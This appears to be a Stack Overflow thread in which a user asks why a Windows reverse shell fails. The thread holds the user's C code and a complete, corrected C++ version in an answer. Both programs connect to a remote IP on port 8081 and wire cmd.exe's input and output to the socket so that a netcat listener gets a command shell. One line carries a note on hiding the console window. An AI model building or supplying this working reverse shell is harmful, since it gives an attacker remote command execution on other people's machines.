# Are WSASockets able to take process I/O without the use of pipes?

Tags: c++, c, sockets, winapi

I'm experimenting with WSASockets and I'm very new to it.

I tried to send the input and the output of a process (cmd.exe in this case, to act like a remote shell) through a socket using handles, but whenever I try to use :

```
si.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;
```

the program exit, without prompting the result to the other end of the socket : 
`nc -lvnp 8081`.
At some point I also tried to switch to normal sockets but I heard that using handles like this would only work with WSA ones because they are non-overlapped.

Here is my code so far :

```
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024

void BindSock(char* rhost, int rport);

int main(int argc, char** argv) {
    //FreeConsole(); // This is the way to make the cmd vanish
    char rhost[] = "xxxxxxxxxxxxxxxx"; // ip to connect to
    int rport = 8081;
    BindSock(rhost, rport);
    return 0;
}
void BindSock(char* rhost, int rport) {
    /*while (1) {*/
        SECURITY_ATTRIBUTES saAttr;
        saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
        saAttr.bInheritHandle = TRUE;
        saAttr.lpSecurityDescriptor = NULL;
        // Initialize Winsock
        WSADATA wsaData;
        int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
        if (iResult != NO_ERROR) {
            printf("WSAStartup function failed with error: %d\n", iResult);
            return;
        }
        printf("[*] Winsock init ... \n");
        //init socket props
        SOCKET sock;
        sock = WSASocketW(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0,0,0);
        if (sock == INVALID_SOCKET) {
            printf("socket function failed with error: %ld\n", WSAGetLastError());
            WSACleanup();
            return;
        }
        printf("[*] Sock init ... \n");
        //Filling struc props
        struct sockaddr_in clientService;
        clientService.sin_family = AF_INET;
        InetPton(AF_INET, rhost, &(clientService.sin_addr));
        clientService.sin_port = htons(rport);

        printf("[*] attempting to connect \n");
        iResult = WSAConnect(sock, (SOCKADDR*)&clientService, sizeof(clientService),NULL,NULL,NULL,NULL);
        if (iResult == SOCKET_ERROR) {
            printf("[!] connect function failed with error: %ld\n", WSAGetLastError());
            iResult = closesocket(sock);
            if (iResult == SOCKET_ERROR)
                printf("[!] closesocket function failed with error: %ld\n", WSAGetLastError());
            WSACleanup();
            return;
        }
        printf("[X] Sock Connected\n");

        STARTUPINFO si;
        PROCESS_INFORMATION pi;

        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));


        si.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
        si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;

        printf("[*] Created process props\n");

        CreateProcessA(NULL, "\"cmd.exe\"", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    //}
}
```

Comment: I suspect you're getting rather confused because you're making POSIX assumptions about a Win32 process. On Win32, there's no such thing as "WSASockets versus normal sockets".  WSASockets _are_ the normal sockets.

Comment: Another thing to note is that using `STARTF_USESTDHANDLES` only helps for processes that write to `STDOUT` and read from `STDIN` handles. But as your own `FreeConsole()` shows, under Win32 you can also have direct console access. And I strongly suspect that `CMD.EXE` is doing that. It's hard to do tab completion on `STDIN/STDOUT`, for instance. Note that on POSIX, curses also requires a console and won't work on redirected handles.

Comment: `WSASocket()` does work with `CreateProcess()` I/O redirection, but only if you use a socket provider which supports that usage. Microsoft's default provider does, but users can use other providers. You can use `WSAEnumProtocols()` to find a provider that has the `XP1_IFS_HANDLES` flag, and then pass its `WSAPROTOCOL_INFO` to `WSASocket()`

Comment: @MSalters I don't really mind about tab completion, for now i'm just trying to make it work :) So do i uncomment the freeconsole function ? 
Maybe i didnt understand clearly the part where you talk about direct console access.

Comment: @RemyLebeau Yes, i'v read about that on many forums and chats, but i still don't receive the output of cmd.exe on the other side of my socket (netcat binary), do you have a clue on that ?

Answer (score 0):

I found the issue, in :

```
CreateProcessA(NULL, "\"cmd.exe\"", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
```

The fifth parameter is for bInheritHandles which must be set to true so that the process can correctly use the handles of the socket.

[Check this doc for more information](https://learn.microsoft.com/en-us/windows/win32/sysinfo/handle-inheritance)

Answer (score 0):

Key points:

1. You need use a socket provider (that has the `XP1_IFS_HANDLES` flag) which supports  I/O redirection. As @Remy Lebeau pointed out.
2. Let new process started with `CreateProcess` inherit current process's handle so that socket handle can be used in new process to write and read. (Set `bInheritHandles` to TRUE.)

There are three protocol providers working for me.

[image]

A complete sample code shared here for anyone interest in.

```
#include <iostream>
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <objbase.h>
#pragma comment(lib, "Ws2_32.lib")


#ifndef UNICODE
#define UNICODE 1
#endif

// Link with ws2_32.lib and ole32.lib
#pragma comment (lib, "ole32.lib")

#define MALLOC(x) HeapAlloc(GetProcessHeap(), 0, (x))
#define FREE(x) HeapFree(GetProcessHeap(), 0, (x))
// Note: could also use malloc() and free()

void BindSock(char* rhost, int rport);

void connect(char* rhost, int rport, LPWSAPROTOCOL_INFOW protocolInfo)
{
    //init socket props
    SOCKET sock;
    sock = WSASocketW(AF_INET, SOCK_STREAM, IPPROTO_TCP, protocolInfo, 0, 0);
    if (sock == INVALID_SOCKET) {
        printf("socket function failed with error: %ld\n", WSAGetLastError());
        WSACleanup();
        return;
    }
    //printf("[*] Sock init ... \n");
    //Filling struc props
    struct sockaddr_in clientService;
    clientService.sin_family = AF_INET;
    InetPton(AF_INET, rhost, &(clientService.sin_addr));
    clientService.sin_port = htons(rport);

    //printf("[*] attempting to connect \n");
    int iResult = WSAConnect(sock, (SOCKADDR*)&clientService, sizeof(clientService), NULL, NULL, NULL, NULL);
    if (iResult == SOCKET_ERROR) {
        printf("[!] connect function failed with error: %ld\n", WSAGetLastError());
        iResult = closesocket(sock);
        if (iResult == SOCKET_ERROR)
            printf("[!] closesocket function failed with error: %ld\n", WSAGetLastError());
        WSACleanup();
        return;
    }
    printf("[X] Sock Connected\n");

    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));


    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = (HANDLE)sock;
    si.hStdOutput = (HANDLE)sock;
    si.hStdError = (HANDLE)sock;

    printf("[*] Created process props\n");

    if (!CreateProcess("c:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
        printf("\nCreateProcess error: %d", GetLastError());

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
}

void BindSock(char* rhost, int rport) {
    /*while (1) {*/
    SECURITY_ATTRIBUTES saAttr;
    saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
    saAttr.bInheritHandle = TRUE;
    saAttr.lpSecurityDescriptor = NULL;
    // Initialize Winsock
    WSADATA wsaData;
    int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != NO_ERROR) {
        printf("WSAStartup function failed with error: %d\n", iResult);
        return;
    }
    printf("[*] Winsock init ... \n");

    // Allocate a 16K buffer to retrieve all the protocol providers
    DWORD dwBufferLen = 16384;
    LPWSAPROTOCOL_INFOW lpProtocolInfo = NULL;
    lpProtocolInfo = (LPWSAPROTOCOL_INFOW)MALLOC(dwBufferLen);
    if (lpProtocolInfo == NULL) {
        wprintf(L"Memory allocation for providers buffer failed\n");
        WSACleanup();
        return;
    }
    int iError = 0;
    INT iNuminfo = 0;
    iNuminfo = WSAEnumProtocolsW(NULL, lpProtocolInfo, &dwBufferLen);
    if (iNuminfo == SOCKET_ERROR) {
        iError = WSAGetLastError();
        if (iError != WSAENOBUFS) {
            wprintf(L"WSAEnumProtocols failed with error: %d\n", iError);
            if (lpProtocolInfo) {
                FREE(lpProtocolInfo);
                lpProtocolInfo = NULL;
            }
            WSACleanup();
            return;
        }
        else {
            wprintf(L"WSAEnumProtocols failed with error: WSAENOBUFS (%d)\n",
                iError);
            wprintf(L"  Increasing buffer size to %d\n\n", dwBufferLen);
            if (lpProtocolInfo) {
                FREE(lpProtocolInfo);
                lpProtocolInfo = NULL;
            }
            lpProtocolInfo = (LPWSAPROTOCOL_INFOW)MALLOC(dwBufferLen);
            if (lpProtocolInfo == NULL) {
                wprintf(L"Memory allocation increase for buffer failed\n");
                WSACleanup();
                return;
            }
            iNuminfo = WSAEnumProtocolsW(NULL, lpProtocolInfo, &dwBufferLen);
            if (iNuminfo == SOCKET_ERROR) {
                iError = WSAGetLastError();
                wprintf(L"WSAEnumProtocols failed with error: %d\n", iError);
                if (lpProtocolInfo) {
                    FREE(lpProtocolInfo);
                    lpProtocolInfo = NULL;
                }
                WSACleanup();
                return;
            }

        }
    }

    wprintf(L"WSAEnumProtocols succeeded with protocol count = %d\n\n",
        iNuminfo);
    for (int i = 0; i < iNuminfo; i++) {
        wprintf(L"Winsock Catalog Provider Entry #%d\n", i);
        wprintf
        (L"----------------------------------------------------------\n");
        // Find protocol provider has the XP1_IFS_HANDLES flag
        if (!(lpProtocolInfo[i].dwServiceFlags1 & XP1_IFS_HANDLES))
            continue;

        // After test and found these three protocol provider support this purpose. 
        if(!((lpProtocolInfo[i].dwCatalogEntryId == 1001) || (lpProtocolInfo[i].dwCatalogEntryId == 1006) || (lpProtocolInfo[i].dwCatalogEntryId == 1007)))
            continue;

        wprintf(L"Entry type:\t\t\t ");
        if (lpProtocolInfo[i].ProtocolChain.ChainLen == 1)
            wprintf(L"Base Service Provider\n");
        else
            wprintf(L"Layered Chain Entry\n");

        wprintf(L"Protocol:\t\t\t %ws\n", lpProtocolInfo[i].szProtocol);
        WCHAR GuidString[40] = { 0 };
        int iRet =
            StringFromGUID2(lpProtocolInfo[i].ProviderId,
            (LPOLESTR)& GuidString, 39);
        if (iRet == 0)
            wprintf(L"StringFromGUID2 failed\n");
        else
            wprintf(L"Provider ID:\t\t\t %ws\n", GuidString);

        wprintf(L"Catalog Entry ID:\t\t %u\n",
            lpProtocolInfo[i].dwCatalogEntryId);

        wprintf(L"ServiceFlags1:\t\t\t 0x%x\n",
            lpProtocolInfo[i].dwServiceFlags1);

        wprintf(L"\n");

        // Try to connect and redirect process output to remote via socket
        connect(rhost, rport, &lpProtocolInfo[i]);
    }

    if (lpProtocolInfo) {
        FREE(lpProtocolInfo);
        lpProtocolInfo = NULL;
    }
    WSACleanup();
}

int main(int argc, char** argv) {
    char rhost[] = "xxxxxxxxx"; // ip to connect to
    int rport = 8081; // select a port
    BindSock(rhost, rport);
    return 0;
}
```